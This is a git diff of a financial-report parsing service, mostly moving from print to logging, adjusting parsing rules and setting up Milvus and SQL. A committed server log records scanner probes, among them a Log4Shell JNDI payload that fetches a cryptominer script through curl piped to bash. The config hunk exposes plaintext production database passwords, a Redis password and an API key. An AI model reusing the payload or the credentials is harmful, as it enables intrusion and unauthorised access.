    start_time = datetime.now()
    print("开始时间:", start_time.strftime("%Y-%m-%d %H:%M:%S"))
    logger.info("开始时间:", start_time.strftime("%Y-%m-%d %H:%M:%S"))

    path = "/Users/zhengfei/Desktop/科润智控1.pdf"
    table_info = get_table_measure(path)

@@ -324,10 +326,10 @@ if __name__ == "__main__":
        table_index = table_obj['page_num'].split("_")[1]
        table_measure = ','.join(table_obj['measure_list'])
        if table_page_num == '3':
            print(f"第{table_page_num}页表格指标为:{table_measure}")
            logger.info(f"第{table_page_num}页表格指标为:{table_measure}")
        table_llm_measure = get_measure_from_llm(table_measure)
        if table_page_num == '3':
            print(f"第{table_page_num}页表格llm指标为:{table_llm_measure}")
            logger.info(f"第{table_page_num}页表格llm指标为:{table_llm_measure}")
        # table_measure_obj['page_num'] = table_page_num
        # table_measure_obj['table_index'] = table_index
        # table_measure_obj['llm_measure'] = table_llm_measure

@@ -352,5 +354,5 @@ if __name__ == "__main__":
    # parse_llm_measure_to_db(measure_info)
    # get_measure_from_llm()
    end_time = datetime.now()
    print("结束时间:", end_time.strftime("%Y-%m-%d %H:%M:%S"))
    logger.info("结束时间:", end_time.strftime("%Y-%m-%d %H:%M:%S"))
    #print(pdf_data)
@@ -19,6 +19,8 @@ from pymilvus import MilvusClient
#import pdf_title
import numpy as np
#from multiprocessing import Process
import logging
logger = logging.getLogger(__name__)



@@ -81,9 +83,9 @@ def get_text_content_test(file_path,file_id,pages,tables_range):

                # Record the page numbers that need to be filtered out
                if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
                    print('成功识别到了')
                    logger.info('成功识别到了')
    except Exception as e:
        print(f"Error processing page {pagenum+1}: {e}")
        logger.error(f"Error processing page {pagenum+1}: {e}")

pdf_path = r"combined_v61.pdf"
file_id = 1
@@ -19,6 +19,8 @@ from pymilvus import MilvusClient
#import pdf_title
import numpy as np
#from multiprocessing import Process
import logging
logger = logging.getLogger(__name__)

STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入'
# If any of these strings appears anywhere in a table, the whole table is dropped

@@ -202,7 +204,7 @@ tables_range = {}
# print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
def get_table_range_test(file_path, file_id, pages, tables_range):

    print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
    logger.info('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
    start = time.time()

    # conn = mysql.connector.connect(

@@ -295,7 +297,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
                'table_index': table_index,
                'page_num': page_num,
            })
    print(f"tables_range的值是{tables_range}")
    logger.debug(f"tables_range的值是{tables_range}")

    # db_service.insert_pdf_parse_process({
    #     'file_id': file_id,

@@ -319,7 +321,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
    # redis_client.close()

    end = time.time()
    print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
    logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))


get_table_range_test(file_path, file_id, pages, tables_range)
@@ -10,6 +10,12 @@ import requests
import config
import numpy as np
from docx2pdf import convert
from config import api_key
import logging
logger = logging.getLogger(__name__)

dashscope.api_key = api_key


def get_md5(str):
    import hashlib

@@ -20,25 +26,27 @@ def get_md5(str):
def embed_with_str(input):
    retry = 0
    max_retry = 5
    t = 0.1
    t = 0.2
    while retry < max_retry:
        # Aliyun API rate limiting
        time.sleep(t)
        # time.sleep(t)
        # Aliyun API rate limiting
        resp = dashscope.TextEmbedding.call(
            model=dashscope.TextEmbedding.Models.text_embedding_v2,
            input=input)
        if resp.status_code == HTTPStatus.OK:
            return resp
        elif resp.status_code == 429:
            print(f'触发限流,等待{t}秒后重试')
            logger.info(f'触发限流,等待{t}秒后重试')
            retry += 1
            t += 0.1
        else:
            print(f'请求失败,状态码:{resp.status_code}')
            logger.error(f'请求失败,状态码:{resp.status_code}')
            return None
    print('重试超过上限')
    logger.error('重试超过上限')
    return None
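One side effect of commenting out the time.sleep(t) call above: the retry loop now re-calls the endpoint immediately, even though the log line still claims to wait t seconds. A hedged sketch of a backoff variant that keeps the log honest (same dashscope call and names as in this file; this is an assumption about intent, not the committed code):

    import time
    def embed_with_backoff(input, max_retry=5, t=0.2):
        for retry in range(max_retry):
            resp = dashscope.TextEmbedding.call(
                model=dashscope.TextEmbedding.Models.text_embedding_v2,
                input=input)
            if resp.status_code == HTTPStatus.OK:
                return resp
            if resp.status_code == 429:
                logger.info(f'触发限流,等待{t}秒后重试')
                time.sleep(t)   # actually wait before retrying
                t += 0.1
                continue
            logger.error(f'请求失败,状态码:{resp.status_code}')
            return None
        logger.error('重试超过上限')
        return None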

# If '归属于' or '扣非' appears, keep the bracketed content and strip punctuation and Chinese numerals.
# If a quarter keyword appears, replace the bracketed content with the quarter.
# If '±' appears, replace the bracketed content with '同期增减'.

@@ -89,7 +97,7 @@ def get_clean_text(text):
        return pattern.sub(lambda match: replacements[match.group(0)], text)
    text = replace_all(text, replacement_dict)
    # Drop a standalone '12月31日' when it is not preceded by a year
    pattern_year = r'(?<!2023年|2022年|2021年)12月31日'
    pattern_year = r'(?<!2025年|2024年|2023年|2022年|2021年)12月31日'
    text = re.sub(pattern_year, '', text)

    pattern = r"\([^)]*\)|\([^)]*\)"  # Also match ASCII parentheses
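A quick check of the widened look-behind (every alternative is the same width, which Python's re module requires; the sample strings are illustrative):

    import re
    pattern_year = r'(?<!2025年|2024年|2023年|2022年|2021年)12月31日'
    print(re.sub(pattern_year, '', '截至12月31日'))    # '截至' - the bare date is dropped
    print(re.sub(pattern_year, '', '2024年12月31日'))  # unchanged - the date is year-qualified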

@@ -137,11 +145,11 @@ def convert_docx_to_pdf(file_path):
        try:
            # Run the conversion
            convert(file_path, pdf_path)
            print(f"转换成功: {pdf_path}")
            logger.info(f"转换成功: {pdf_path}")
        except Exception as e:
            print(f"转换失败: {e}")
            logger.error(f"转换失败: {e}")
    else:
        print("错误: 文件必须是 .docx 格式。")
        logger.error("错误: 文件必须是 .docx 格式。")

def save_pdf_from_url(url, file_path):
    from urllib.parse import unquote

@@ -163,10 +171,10 @@ def save_pdf_from_url(url, file_path):

        with open(local_file_path, 'wb') as file:
            file.write(response.content)
        print(f"文件已下载到 {local_file_path}")
        logger.info(f"文件已下载到 {local_file_path}")
    else:
        # The download failed
        print(f"无法下载文件,状态码:{response.status_code}")
        logger.error(f"无法下载文件,状态码:{response.status_code}")

    return local_file_path

@@ -252,7 +260,7 @@ def get_season_flag(text):
    return '0'

def get_percent_flag(text):
    percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|变动比例|本年度比上年度增减|增减'
    percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|本期期末金额较上期期末变动比例'
    if len(re.findall(percent_word, text)) > 0:
        return '1'
    else:

@@ -293,40 +301,7 @@ def check_black_list(meta_measure, pdf_measure, black_array):

def check_black_list_old(meta_measure, pdf_measure):
    # Check whether the measure name contains a black-listed word
    #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
        ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
        ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
        ,'扣非净利润:净资产,净利率,年度公司'
        ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
        ,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
        ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
        ,'非经常性损益:扣除非经常性损益'
        ,'基本每股收益:稀释每股收益,发行新股'
        ,'稀释每股收益:基本每股收益,发行新股'
        ,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
        ,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
        ,'应付账款:应收账款,年以上,内,至,到'
        ,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
        ,'研发投入:比例,比率,占比,费用,占'
        ,'资本化研发投入:比例,比率,占比,费用,占'
        ,'资本化研发投入占比:金额,费用'
        ,'研发投入占营业收入比例:金额,费用'
        ,'上年年末:1月1日'
        ,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
        ,'期扣非加权平均净资产收益率:同比,年化,每股'
        ,'加权平均净资产收益率同比变动:年化,每股'
        ,'研发费用:制造,投入,直接,管理'
        ,'应收账款:1-2年','货币资金:在途'
        ,'当期:2023年1-6月,调整后'
        ,'营业成本:营业总成本'
        ,'长期借债:年内到期','研发投入:直接'
        ,'第一季度:第二季度,第三季度,第四季度'
        ,'第二季度:第一季度,第三季度,第四季度'
        ,'第三季度:第二季度,第一季度,第四季度'
        ,'第四季度:第二季度,第三季度,第一季度'
        ,'研发费用:研发支出,研发投入','存货:跌价准备'
        ,'费用:日常,付现','固定资产:改良,补助,投资']
    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用']
    # current_period = f'当期:{report_year}年1-6月'
    # black_array.append(current_period)
    for black in black_array:
@@ -550,26 +525,26 @@ def check_black_table_list(data):
        black_meta = black.split(':')[0]
        black_pdfs = black.split(':')[1].split(',')
        if any(black_meta in cell for row in data for cell in row):
            print(data)
            logger.debug(data)
            for pdf in black_pdfs:
                data = [row for row in data if not any(pdf in cell for cell in row)]
    return data
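To make the filtering rule concrete, here is a hypothetical black-list entry and table run through the same two steps (both the entry and the table are illustrative, not from the repo's config):

    black = '母公司:资产总计,负债合计'
    data = [['资产总计(母公司)', '100'], ['营业收入', '200']]
    black_meta = black.split(':')[0]             # '母公司'
    black_pdfs = black.split(':')[1].split(',')  # ['资产总计', '负债合计']
    if any(black_meta in cell for row in data for cell in row):
        for pdf in black_pdfs:
            data = [row for row in data if not any(pdf in cell for cell in row)]
    print(data)  # [['营业收入', '200']] - the trigger word was present, so matching rows were dropped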

if __name__ == '__main__':

    print(len('我是我'))
    logger.debug(len('我是我'))

    # print(under_non_alpha_ratio('202水电费水电费水电费是的205月'))
    # logger.debug(under_non_alpha_ratio('202水电费水电费水电费是的205月'))
    # title = '母公司财务报表主要项目注释'
    # if len(re.findall('母公司|现金流量表补充', title)) > 0 and len(re.findall('项目注释', title)) == 0:
    #     print('1')
    #     logger.debug('1')
    # else:
    #     print('0')
    #     logger.debug('0')

    # print(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
    # logger.debug(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
    # test = '2023年1-12月'
    # print(get_period_type('上年度本期费用化研发投入'))
    # print(get_period_type('费用化研发投入本年度'))
    # logger.debug(get_period_type('上年度本期费用化研发投入'))
    # logger.debug(get_period_type('费用化研发投入本年度'))
    # vector_a = embed_with_str('第一季度营业收入')
    # vector = vector_a.output["embeddings"][0]["embedding"]

@@ -577,7 +552,7 @@ if __name__ == '__main__':
    # vector1 = vector_b.output["embeddings"][0]["embedding"]

    # similarity = cosine_similarity(vector, vector1)
    # print(f"余弦相似度: {similarity}")
    # logger.debug(f"余弦相似度: {similarity}")

    # measure_data = [
    #     '1,1,营业收入2023年金额,1003535799.51',

@@ -792,21 +767,14 @@ if __name__ == '__main__':
    # )
    # vector_obj = embed_with_str('2023年营业收入')
    # vector = vector_obj.output["embeddings"][0]["embedding"]
    # data = [vector]
    # res = client.search(
    #     collection_name="zzb_measure",  # Replace with the actual name of your collection
    #     # Replace with your query vector
    #     data=data,
    #     limit=1,  # Max. number of search results to return
    #     search_params={"metric_type": "COSINE", "params": {}},  # Search parameters
    #     output_fields=["measure_name","measure_value"]
    # )

    # # Convert the output to a formatted JSON string
    # result = json.dumps(res, indent=4, ensure_ascii=False)
    # print(result)
    # vector_b = embed_with_str('营业收入第一季度')
    # vector1 = vector_b.output["embeddings"][0]["embedding"]

    # similarity = cosine_similarity(vector, vector1)
    # logger.debug(f"余弦相似度: {similarity}")

    # insert_measure_data(client, measure_data)
    # text = '营业收入第一季度(1-3月份)'
    # new_text = re.sub(r'([^)]*)', '', text)
    # print(new_text)
    # logger.debug(new_text)
@@ -0,0 +1,3 @@
--2024-12-27 11:22:17--  https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
wget: unable to resolve host address ‘financial-report.obs.cn-east-3.myhuaweicloud.com’
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
  <component name="NewModuleRootManager">
    <content url="file://$MODULE_DIR$">
      <excludeFolder url="file://$MODULE_DIR$/venv" />
    </content>
    <orderEntry type="jdk" jdkName="Python 3.8" jdkType="Python SDK" />
    <orderEntry type="sourceFolder" forTests="false" />
  </component>
  <component name="PyDocumentationSettings">
    <option name="format" value="PLAIN" />
    <option name="myDocStringFormat" value="Plain" />
  </component>
</module>
Binary file not shown.
Binary file not shown.
Binary file not shown.

@@ -27,43 +27,4 @@ def create_partition_by_hour(current_hour):
        pre_partition = collection.partition(name)
        pre_partition.release()
        collection.drop_partition(name)
        print(f"Partition '{name}' deleted.")


from pymilvus import connections, CollectionSchema, Collection, utility, FieldSchema, DataType
# Connect to Milvus on server B
# connections.connect(host='124.70.129.232', port='19530')  # test server
connections.connect(host='127.0.0.1', port='19530')  # test server
# Get the collection list
utility.drop_collection("pdf_measure_v4")

# Define the fields
fields = [
    FieldSchema(name="id", dtype=DataType.INT64, is_primary=True, auto_id=True),
    FieldSchema(name="vector", dtype=DataType.FLOAT_VECTOR, dim=1536),
    FieldSchema(name="table_num", dtype=DataType.INT16),
    FieldSchema(name="table_index", dtype=DataType.INT16),
    FieldSchema(name="measure_name", dtype=DataType.VARCHAR, max_length=200),
    FieldSchema(name="measure_value", dtype=DataType.VARCHAR, max_length=200),
    FieldSchema(name="file_id", dtype=DataType.VARCHAR, max_length=200),
    FieldSchema(name="measure_unit", dtype=DataType.VARCHAR, max_length=200)
]

# Define the collection schema
schema = CollectionSchema(fields=fields, description="My Milvus collection")

# Create the collection
collection = Collection(name="pdf_measure_v4", schema=schema)

collection = Collection("pdf_measure_v4")
index_params = {
    "index_type": "IVF_FLAT",
    "metric_type": "COSINE",
    "params": {"nlist": 128}
}
collection.create_index(field_name="vector", index_params=index_params)
collection.load()
print(f"Partition '{name}' deleted.")
|
|
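For context, a minimal sketch of querying the collection created above; the query vector is a placeholder and nprobe is illustrative (IVF_FLAT's search-time knob), not a value taken from this repo:

from pymilvus import Collection, connections

connections.connect(host='127.0.0.1', port='19530')
collection = Collection("pdf_measure_v4")
collection.load()

# Placeholder query vector; in practice this comes from the same 1536-dim
# embedding model that produced the vectors at insert time.
query_vector = [0.0] * 1536
results = collection.search(
    data=[query_vector],
    anns_field="vector",
    param={"metric_type": "COSINE", "params": {"nprobe": 16}},
    limit=3,
    output_fields=["measure_name", "measure_value"],
)
for hit in results[0]:
    print(hit.distance, hit.entity.get("measure_name"))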
@ -0,0 +1,5 @@
nohup: ignoring input
INFO: Started server process [1654611]
INFO: Waiting for application startup.
INFO: Application startup complete.
INFO: Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)
@ -0,0 +1,521 @@
nohup: ignoring input
INFO: Started server process [2255841]
INFO: Waiting for application startup.
INFO: Application startup complete.
INFO: Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 80.66.83.46:32838 - "CONNECT 80.66.83.46%3A80 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.197.53:3545 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.50:35771 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.47:13919 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.48:21545 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:50780 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 125.36.252.182:35210 - "HEAD http%3A//110.242.68.4/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:45035 - "GET http%3A//www.wujieliulan.com/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:63911 - "CONNECT www.baidu.com%3A443 HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:56321 - "GET http%3A//www.rfa.org/english/ HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:41815 - "GET http%3A//www.epochtimes.com/ HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:15541 - "GET http%3A//www.minghui.org/ HTTP/1.1" 404 Not Found
...
INFO: 185.91.127.9:43792 - "GET /t%28%27%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%24%7Benv%3ANaN%3A-%3A%7D%24%7Benv%3ANaN%3A-l%7Ddap%24%7Benv%3ANaN%3A-%3A%7D//89.34.230.11%3A3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27%29 HTTP/1.1" 404 Not Found
...
INFO: 138.197.191.87:39360 - "GET / HTTP/1.1" 404 Not Found
ERROR: Exception in ASGI application
Traceback (most recent call last):
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 407, in run_asgi
    result = await app(  # type: ignore[func-returns-value]
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/middleware/proxy_headers.py", line 69, in __call__
    return await self.app(scope, receive, send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/fastapi/applications.py", line 1054, in __call__
    await super().__call__(scope, receive, send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/applications.py", line 123, in __call__
    await self.middleware_stack(scope, receive, send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 186, in __call__
    raise exc
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 164, in __call__
    await self.app(scope, receive, _send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/exceptions.py", line 65, in __call__
    await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 78, in wrapped_app
    await response(scope, receive, sender)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/responses.py", line 152, in __call__
    await send(
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 50, in sender
    await send(message)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 161, in _send
    await send(message)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 489, in send
    output = self.conn.send(event=response)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 512, in send
    data_list = self.send_with_data_passthrough(event)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 537, in send_with_data_passthrough
    self._process_event(self.our_role, event)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 272, in _process_event
    self._cstate.process_event(role, type(event), server_switch_event)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 293, in process_event
    self._fire_event_triggered_transitions(role, _event_type)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 311, in _fire_event_triggered_transitions
    raise LocalProtocolError(
h11._util.LocalProtocolError: can't handle event type Response when role=SERVER and state=MUST_CLOSE
INFO: 138.197.191.87:39362 - "GET / HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49354 - "GET /server HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49358 - "GET /version HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49374 - "GET /.vscode/sftp.json HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49388 - "GET /about HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49394 - "GET /debug/default/view?panel=config HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49404 - "GET /v2/_catalog HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49416 - "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49430 - "GET /server-status HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49442 - "GET /_all_dbs HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49446 - "GET /.DS_Store HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36216 - "GET /.env HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36226 - "GET /.git/config HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36240 - "GET /s/330313e20363e24393e213/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36252 - "GET /config.json HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36262 - "GET /telescope/requests HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36272 - "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 404 Not Found
...
INFO: 45.83.65.202:56736 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.83.66.235:14182 - "GET /favicon.ico HTTP/1.1" 404 Not Found
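The repeated 404s and "Invalid HTTP request received." warnings above are internet-wide scanners probing the publicly bound port, and the h11 LocalProtocolError is uvicorn attempting to write a response on a connection that has already entered the MUST_CLOSE state after a malformed request. A minimal hardening sketch (an assumption about the deployment, not code from this repo): bind the app to loopback and expose it only through a reverse proxy or firewall rule:

from fastapi import FastAPI
import uvicorn

app = FastAPI()  # stand-in for the real application object

if __name__ == "__main__":
    # Listening on 127.0.0.1 instead of 0.0.0.0 keeps the raw ASGI server off
    # the public internet; a reverse proxy or security-group rule fronts it.
    uvicorn.run(app, host="127.0.0.1", port=8001)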
@ -3,7 +3,6 @@ from pydantic import BaseModel
import os
import utils
import queue
import multiprocessing
from multiprocessing import Process
import word_title
import time
@ -85,7 +84,7 @@ def run_job():
        p = Process(target=main_word.process_table, args=(file_id, job_info,))
        processes.append(p)
        p.start()
    applog.info(f'Waiting for all subtasks to finish, task ID: {file_id}')
    applog.info(f'Waiting for all subtasks to finish, task ID: {file_id}' )
    for p in processes:
        p.join()
@ -213,14 +212,14 @@ app.post("/parser/start",
# Run the FastAPI app
if __name__ == "__main__":
    # Start the service on the server
    # import uvicorn
    #
    # uvicorn.run(app, host="0.0.0.0", port=config.PORT)
    import uvicorn

    uvicorn.run(app, host="0.0.0.0", port=config.PORT)
    # Local debugging job (note: uvicorn.run blocks, so the lines below only
    # execute after the server exits)
    file_id = "201917"
    job_queue.put({
        'file_path': '1.docx',
        'file_id': file_id,
    })
    db_service_word.delete_database(file_id)
    run_job()
    # file_id = "201837"
    # job_queue.put({
    #     'file_path': '西部建设.docx',
    #     'file_id': file_id,
    # })
    # db_service_word.delete_database(file_id)
    # run_job()
@ -1,33 +1,23 @@
MILVUS_CLIENT='http://124.70.129.232:19530'
#MILVUS_CLIENT='http://60.204.228.154:19530'
MYSQL_HOST = '121.37.185.246'
MILVUS_CLIENT='http://127.0.0.1:19530'
MILVUS_HOST = '127.0.0.1'
MILVUS_PORT = 19530
MYSQL_HOST = '10.127.2.207'
MYSQL_PORT = 3306
MYSQL_USER = 'financial'
MYSQL_PASSWORD = 'financial_8000'
MYSQL_DB = 'financial_report'

# NOTIFY_ADDR = 'http://192.168.0.175:8100/api/tenant/report/notify'

NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify'

# REDIS_HOST = '127.0.0.1'
REDIS_HOST = '123.60.153.169'
MYSQL_USER = 'financial_prod'
MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
MYSQL_DB = 'financial_report_prod'
NOTIFY_ADDR = 'http://10.127.2.202:8100/api/tenant/report/notify'
FILE_PATH = '/root/pdf_parser/word/'
REDIS_HOST = '10.127.2.209'
REDIS_PORT = 6379
REDIS_PASSWORD = 'Xgf_redis'
FILE_PATH = '/root/word_parser/word/'
REDIS_PASSWORD = 'dMrt4kmwiW6LDJXy'
PORT = 8001
MEASURE_COUNT = 8

# MYSQL_HOST_APP = '192.168.0.201'#192.168.0.201
# MYSQL_PORT_APP = 3306
# MYSQL_USER_APP = 'root'
# MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
# MYSQL_DB_APP = 'financial_report_prod'

MYSQL_HOST_APP = '121.37.185.246'#192.168.0.201
MYSQL_HOST_APP = '10.127.2.207'
MYSQL_PORT_APP = 3306
MYSQL_USER_APP = 'financial'
MYSQL_PASSWORD_APP = 'financial_8000'
MYSQL_DB_APP = 'financial_report'
MYSQL_USER_APP = 'financial_prod'
MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
MYSQL_DB_APP = 'financial_report_prod'
api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
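The config above commits hosts and secrets in plaintext. A common alternative (a sketch only; the variable names mirror the file, the defaults are illustrative) is to resolve them from the environment:

import os

MILVUS_CLIENT = os.getenv('MILVUS_CLIENT', 'http://127.0.0.1:19530')
MYSQL_HOST = os.getenv('MYSQL_HOST', '127.0.0.1')
MYSQL_PORT = int(os.getenv('MYSQL_PORT', '3306'))
# Fail fast if a secret was not provisioned instead of shipping a default.
MYSQL_PASSWORD = os.environ['MYSQL_PASSWORD']
REDIS_PASSWORD = os.environ['REDIS_PASSWORD']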
@ -154,9 +154,9 @@ if __name__ == "__main__":
    )
    cursor = conn.cursor()

    # measure_config_to_db(conn,cursor)
    measure_config_to_db(conn,cursor)

    insert_measure_vector(conn,cursor)
    # insert_measure_vector(conn,cursor)

    # cursor.close()
    # conn.close()
@ -208,6 +208,17 @@ def update_ori_measure(conn,cursor,file_id):
        and t1.file_id = '{file_id}'
        and t2.year = '{year}'
    '''.format(file_id=file_id, year=report_year)

    select_query_first_quarter = '''
        SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
        FROM ori_measure_list t1
        left join
        measure_config_first_quarter t2
        on t1.ori_measure_id = t2.ori_measure_id
        where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
        and t1.file_id = '{file_id}'
        and t2.year = '{year}'
    '''.format(file_id=file_id, year=report_year)

    if report_type == 1:
        start_time = time.time()
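These queries interpolate file_id and year with str.format. Since the cursor comes from a MySQL driver that supports placeholders, a parameterized variant (a sketch of the same first-quarter query, using the surrounding cursor and variables) sidesteps quoting and injection issues:

select_query_first_quarter = '''
    SELECT t2.measure_id, t2.measure_name, t1.ori_measure_id
    FROM ori_measure_list t1
    LEFT JOIN measure_config_first_quarter t2
           ON t1.ori_measure_id = t2.ori_measure_id
    WHERE t2.measure_id IS NOT NULL
      AND (t1.measure_id IS NULL OR t1.measure_id = '')
      AND t1.file_id = %s
      AND t2.year = %s
'''
cursor.execute(select_query_first_quarter, (file_id, report_year))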
@ -216,6 +227,13 @@ def update_ori_measure(conn,cursor,file_id):
        end_time = time.time()
        applog.info(f"Update-data query took {(end_time - start_time):.2f} s.")
        applog.info('update_ori_measure took the semi-annual report branch')
    elif report_type == 2:
        start_time = time.time()
        cursor.execute(select_query_first_quarter)
        records = cursor.fetchall()
        end_time = time.time()
        applog.info(f"Update-data query took {(end_time - start_time):.2f} s.")
        applog.info('update_ori_measure took the first-quarter report branch')
    elif report_type == 3:
